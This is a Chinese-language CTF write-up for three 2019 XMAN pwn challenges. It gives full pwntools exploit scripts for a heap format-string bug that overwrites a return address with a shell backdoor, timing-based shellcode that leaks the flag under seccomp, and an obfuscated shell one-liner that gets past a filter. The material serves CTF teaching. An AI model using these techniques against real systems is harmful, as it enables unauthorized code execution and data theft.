2019 xman writeup

format

32位格式化字符串漏洞,只开了NX保护,有多次漏洞利用机会，并且有system(“/bin/sh”),题目难点在于是堆上的格式化字符串漏洞，不能用常规的任意地址写手法

解题思路：

寻找如下图合适的跳板，第一次修改跳板为函数返回地址所在的栈地址，第二次修改函数返回地址为后门的地址。

exp

成功几率16分之一

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import * 
context.log_level='debug' 
for y in xrange(5000): 
	#with remote("node3.buuoj.cn",26370) as p: 
	with process("./chall") as p: 
		p.recvuntil("...\n") 
		p.recvuntil("...\n") 
		gdb.attach(p,"b *0x080485F6")
		p.sendline("%60c%10$hhn|%34219c%18$hnBBB")
		#pause()
		try:
			p.recvuntil("BBB") 
			#p.interactive() 
			p.sendline("ls") 
			data = p.recvuntil("flag") 
			print(data) 
			if("flag" in data): 
				p.interactive() 
		except Exception as e: 
				print('exception %s' % e) 
				p.close()

nocall

64位程序，保护全开。题目提示输入shellcode,但这个题使用了seccomp机制，限制了execve系统调用。

解题思路

因为flag的地址已经暴露了，程序也开启了5秒的计时器，可以通过基于时间的方法爆破flag。

exp

#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
from pwn import *
from time import time
from string import printable
#context.log_level = "debug"
context.arch = "amd64"

flag=''
s = '}{-0123456789abcdefghijklmnopqrstuvwxyz'
for i in range(0x2000000000,0x200000000+0x30):
    for j in s:
        payload=asm(
            """
            mov al,[{}]
            mov bl,{}
        loop:
            cmp al,bl
            jz loop
            ret
            """.format(str(hex(i)),str(hex(ord(j)))))
        try:
            #p = remote("node3.buuoj.cn",29793)
            p = process("./chall")
            p.recvuntil("Your Shellcode >>")
            time1=time()

            print str(hex(i))+"-----"+j
            p.sendline(payload)
            p.can_recv(2)

            time2=time()
            p.close()
            #pause()
            if time2-time1>1:
                flag+=j
                print flag
                break
            else:
                pass
        except:
            pass

print flag

shellmaster

A=${PATH##*:};B=${A%???};$PWD$B????